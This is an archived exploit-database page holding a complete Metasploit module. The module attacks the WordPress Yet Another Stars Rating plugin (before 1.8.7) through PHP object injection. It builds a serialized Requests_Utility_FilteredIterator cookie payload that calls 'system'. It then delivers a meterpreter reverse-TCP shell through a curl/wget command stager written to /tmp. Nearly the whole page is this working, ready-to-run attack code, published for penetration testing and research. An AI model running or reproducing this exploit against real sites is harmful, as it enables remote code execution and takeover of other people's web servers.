what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Yet Another Stars Rating PHP Object Injection

WordPress Yet Another Stars Rating PHP Object Injection
Posted Dec 18, 2020
Authored by gx1, Paul Dannewitz | Site metasploit.com

This Metasploit module affects WordPress Yet Another Stars Rating plugin versions prior to 1.8.7 and demonstrates a PHP object injection vulnerability.

tags | exploit, php
SHA-256 | a1a09a3983590ec069365baa90b96a395451c12d03067449dba59d8e803a84f5

WordPress Yet Another Stars Rating PHP Object Injection

Change Mirror Download
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7',
'Description' => %q{
This module exploits Wordpress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7.
The vulnerability is exploitable if there is the Wordpress site uses a 'yasr_visitor_votes'
shortcode in a page (authenticated or not).

This exploit uses the Requests_Utility_FilteredIterator as WP core class to exploit deserialization.
The class allows to send an array and a callback in the constructur, and it will be called in every foreach loop.
As the vulnerable module uses the unserialized cookie for a foreach loop, it is possible to exploit this behaviour
to exploit the vulnerability.
Wordpress disable deserialization for Requests_Utility_FilteredIterator in Wordpress >= 5.5.2, so the exploit only
works for Wordpress versions < 5.5.2.

Tested on:
- Wordpress 5.4.1,
- Yet Another Stars rating plugin = 1.8.6
- php 5.6 (in php7 you should customize the serialization payload to try the exploitation)


},
'Author' =>
[
'Paul Dannewitz', # Vulnerability Discovery
'gx1 <g.per45[at]gmail.com>', # Exploit Developer
],
'Platform' => 'linux',
'Arch' => ARCH_PHP,
'Targets' => [['WordPress', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl'
},
'CmdStagerFlavor' => ['curl', 'wget'],
'References' =>
[
['URL', 'https://wpscan.com/vulnerability/9207'],
['URL', 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'],
['URL', 'https://www.cybersecurity-help.cz/vulnerabilities/17273/'],
['URL', 'https://cybersecsi.com/study-php-unserialize-object-injection-in-yet-another-stars-rating-plugin-by-using-docker-security-playground/'] # Exploit development explanation
],
'License' => MSF_LICENSE
))

register_options([
OptString.new('PATH_CONTAINING_YASR_SHORTCODE', [true, 'The path containing yasr_visitor_votes shortcode', '/'] ),
OptBool.new('REQUIRE_LOGIN', [true, 'If you need login to view tha path containing yasr shortcode', false] ),
OptString.new('USERNAME', [false, 'The Wordpress username to authenticate with'] ),
OptString.new('PASSWORD', [false, 'The Wordpress username to authenticate with'] )
])
register_advanced_options([
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
end
def yasr_path
return datastore['PATH_CONTAINING_YASR_SHORTCODE']
end

def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end

def username
return datastore['USERNAME']
end

def password
return datastore['PASSWORD']
end

def require_login
return datastore['REQUIRE_LOGIN']
end

def check
if not wordpress_and_online?
print_error("#{target_uri} does not seem to be WordPress site")
return
end
version = wordpress_version
if not version.nil?
print_status("#{target_uri} - WordPress Version #{version} detected") if version
if Gem::Version.new(version) >= Gem::Version.new("5.5.2")
print_bad("Version higher or equal to 5.5.2")
return CheckCode::Safe
end

return check_plugin_version_from_readme('yet-another-stars-rating', '1.8.7')
end
return CheckCode::Unknown
end

def serialized_payload(p)
return "C%3A33%3A%22Requests_Utility_FilteredIterator%22%3A#{p.length + 63 + p.length.digits.length }%3A%7Bx%3Ai%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A#{p.length}%3A%22#{URI.encode_www_form_component(p)}%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A6%3A%22system%22%3B%7D%7D"
end

def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
if require_login
print_status("Authentication required, try to login")
cookie = wordpress_login(username, password)
if cookie
print_status("Login successed")
else
fail_with('Authentication failed', "Unable to login")
end
else # No login: empty cookie
cookie = ""
end
print_status("Run exploit")
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
@cmdstager = generate_cmdstager(
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path)
).join(';')

register_file_for_cleanup(cmdstager_path)
sp = serialized_payload(@cmdstager)
print_status("Send serialized payload: #{sp}")
cookie = "#{cookie} yasr_visitor_vote_cookie=#{sp}"

res = send_request_cgi({
'method' => 'GET',
'uri' => yasr_path,
'cookie' => cookie},
1)
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close